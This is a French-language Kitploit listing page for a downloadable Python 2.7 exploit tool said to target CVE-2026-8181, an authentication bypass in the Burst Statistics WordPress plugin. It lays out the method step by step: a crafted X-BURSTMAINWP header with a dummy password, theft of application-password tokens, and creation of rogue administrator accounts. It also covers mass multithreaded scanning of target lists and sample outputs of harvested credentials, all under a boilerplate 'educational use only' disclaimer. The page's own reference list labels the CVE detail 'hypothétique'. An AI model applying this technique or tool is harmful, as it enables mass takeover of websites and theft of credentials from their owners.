Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-8181 — CVE-2026-8181 : Contournement d'authentification Burst Statistics → prise de contrôle de l'API REST & création d'administrateur. Python 2.7. Usage éducatif uniquement. | Kitploit
Outils/GitHubGitHub/jenderal92/cve-2026-8181
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionAuthentificationApprentissage et Éducation
GitHubjenderal92/cve-2026-8181

CVE-2026-8181

CVE-2026-8181 : Contournement d'authentification Burst Statistics → prise de contrôle de l'API REST & création d'administrateur. Python 2.7. Usage éducatif uniquement.

Voir le dépôt
5il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-8181 - Exploit de contournement d'authentification Burst Statistics

Exploit Python 2.7 pour la vulnérabilité du plugin Burst Statistics (CVE-2026-8181) qui permet à des attaquants non authentifiés de contourner l'authentification de l'API REST, de récupérer les mots de passe d'application et de créer de nouveaux utilisateurs administrateurs sur des sites WordPress vulnérables.

⚠️ Avertissement
Cet outil est destiné uniquement à des fins éducatives et de tests de sécurité autorisés. L'accès non autorisé à des systèmes informatiques est illégal. Utilisez-le uniquement sur des sites Web que vous possédez ou pour lesquels vous disposez d'une autorisation explicite de test. Vous pouvez consulter l'avertissement complet sur le profil de Jenderal92. Consultez-le ICI !!!

CVE-2026-8181 affecte le plugin Burst Statistics pour WordPress (versions antérieures au correctif). La faille réside dans le mécanisme d'authentification de l'API REST, permettant à un attaquant de :

  • Contourner l'authentification en envoyant un en-tête X-BURSTMAINWP spécialement conçu
  • Récupérer les mots de passe d'application via le point de terminaison /burst/v1/mainwp-auth
  • Effectuer des actions privilégiées (lister les utilisateurs, lire les paramètres, créer de nouveaux comptes administrateur) via l'API REST de WordPress

Fonctionnalités

  • Analyse multi-thread (10 threads par défaut)
  • Détection automatique des chemins de base WordPress (/, /wordpress, /wp)
  • Énumération des noms d'utilisateur via /wp-json/wp/v2/users ou redirections par ID d'auteur
  • Exploitation du contournement d'authentification pour :
    • Obtenir les mots de passe d'application (jeton encodé en Base64)
    • Vérifier l'accès aux points de terminaison REST sensibles (paramètres, plugins, utilisateurs administrateurs)
    • Créer un nouvel utilisateur administrateur avec des identifiants aléatoires
  • Deux fichiers de sortie :
    • res_login.txt – Identifiants REST API concis, séparés par des barres verticales (faciles à analyser/importer)
    • full_res_login.txt – Rapport complet lisible par un humain, incluant la vérification d'accès et les mots de passe d'application
  • Prérequis

    • Python 2.7 (obsolète mais requis par le script)
    • Bibliothèque requests
    root@kitploit:~
    pip install requests
    

    Utilisation

    1. Préparez un fichier de liste de cibles (un domaine ou une IP par ligne, avec ou sans http:///https://).

      Exemple targets.txt :

      root@kitploit:~
      example.com
      https://vulnerable-site.com
      127.0.0.1/wordpress
      
    2. Exécutez l'exploit :

    root@kitploit:~
    python2 CVE-2026-8181.py targets.txt
    
    1. Les résultats sont enregistrés dans deux fichiers dans le répertoire courant :
      • res_login.txt – Identifiants REST API (une ligne par cible vulnérable)
      • full_res_login.txt – Rapport détaillé

    Options de ligne de commande

    ArgumentDescription
    list.txtChemin vers le fichier contenant les URL cibles

    Exemple de sortie (console)

    root@kitploit:~
    ============================================================
    CVE-2026-8181 - Burst Statistics Auth Bypass Exploit
    ============================================================
    [*] Total targets: 2
    [*] Threads: 10
    [*] Base paths: ['', '/wordpress', '/wp']
    
    [*] Scanning: example.com
        Trying path: /
        Detected username: admin
        [+] VULNERABLE! REST API bypass successful
        [+] Application Password obtained!
        [+]   Username: admin
        [+]   App Password: xxxx xxxx xxxx
        [+]   Base64 Token: YWRtaW46eHh4eA==
        [+] Access confirmed: WordPress settings
        [+] Access confirmed: Installed plugins
        [+] Access confirmed: Admin users
        [+] Admin user created via REST API: wp_abc123
        [+] Results saved to res_login.txt and full_res_login.txt
    

    Formats des fichiers de sortie

    1. res_login.txt – Identifiants REST API concis

    Chaque ligne suit ce format séparé par des barres verticales :

    root@kitploit:~
    target|username|password|email|user_id
    

    Exemple :

    root@kitploit:~
    http://example.com|wp_xyz789|AbC123xyz456|[email protected]|42
    

    Ce format est idéal pour :

    • Importer dans des gestionnaires de mots de passe ou des bases de données
    • Automatiser d'autres actions (par exemple, des scripts de connexion)
    • Inspection rapide avec cut, grep ou Excel

    2. full_res_login.txt – Rapport complet et détaillé

    Pour chaque cible vulnérable, le script ajoute un bloc lisible par un humain :

    root@kitploit:~
    ============================================================
    Target: http://example.com
    ============================================================
    
    [+] Access Verification:
        [+] WordPress settings
        [+] Installed plugins
        [+] Admin users
    
    [+] REST API Credentials:
        Username: wp_abc123
        Password: random12char
        Email: [email protected]
        User ID: 42
        URL: http://example.com/wp-admin/
        Note: Use with X-BURSTMAINWP header
    
    [+] Application Password:
        Username: admin
        App Password: xxxx xxxx xxxx
        Base64 Token: YWRtaW46eHh4eA==
    

    Remarque : Si le point de terminaison du mot de passe d'application n'est pas disponible ou ne renvoie aucun jeton, cette section affichera FAILED.

    Comment cela fonctionne

    1. Préparation des cibles – Ajoute le préfixe http:// s'il est manquant, supprime les barres obliques finales.
    2. Itération des chemins – Essaie /, /wordpress et /wp comme répertoires de base WordPress.
    3. Énumération des noms d'utilisateur – Récupère /wp-json/wp/v2/users ou utilise les redirections ?author=N.
    4. Test de contournement – Envoie X-BURSTMAINWP: 1 + authentification Basic avec le nom d'utilisateur et un mot de passe factice (CVE-2026-8181). Si le point de terminaison /wp-json/wp/v2/users/me?context=edit renvoie 200, le site est vulnérable.
    5. Exploitation –
      • Envoie une requête à /wp-json/burst/v1/mainwp-auth pour récupérer un jeton de mot de passe d'application.
      • Vérifie l'accès à /settings, /plugins, /users.
      • Crée un nouveau compte administrateur via POST /wp-json/wp/v2/users.
    6. Enregistrement des résultats – Écrit les identifiants REST concis dans res_login.txt et les détails complets dans full_res_login.txt.

    Personnalisation

    Vous pouvez modifier ces variables dans le script :

    • THREADS – Nombre de threads simultanés (10 par défaut)
    • BASE_PATHS – Sous-répertoires WordPress supplémentaires à vérifier
    • Valeurs de délai d'attente (timeout) de requests

    Licence

    Ce projet est fourni à des fins éducatives uniquement. Utilisez-le à vos propres risques.

    Références

    • Détail de CVE-2026-8181 (hypothétique)
    • Plugin Burst Statistics (versions affectées)
    Télécharger l’outil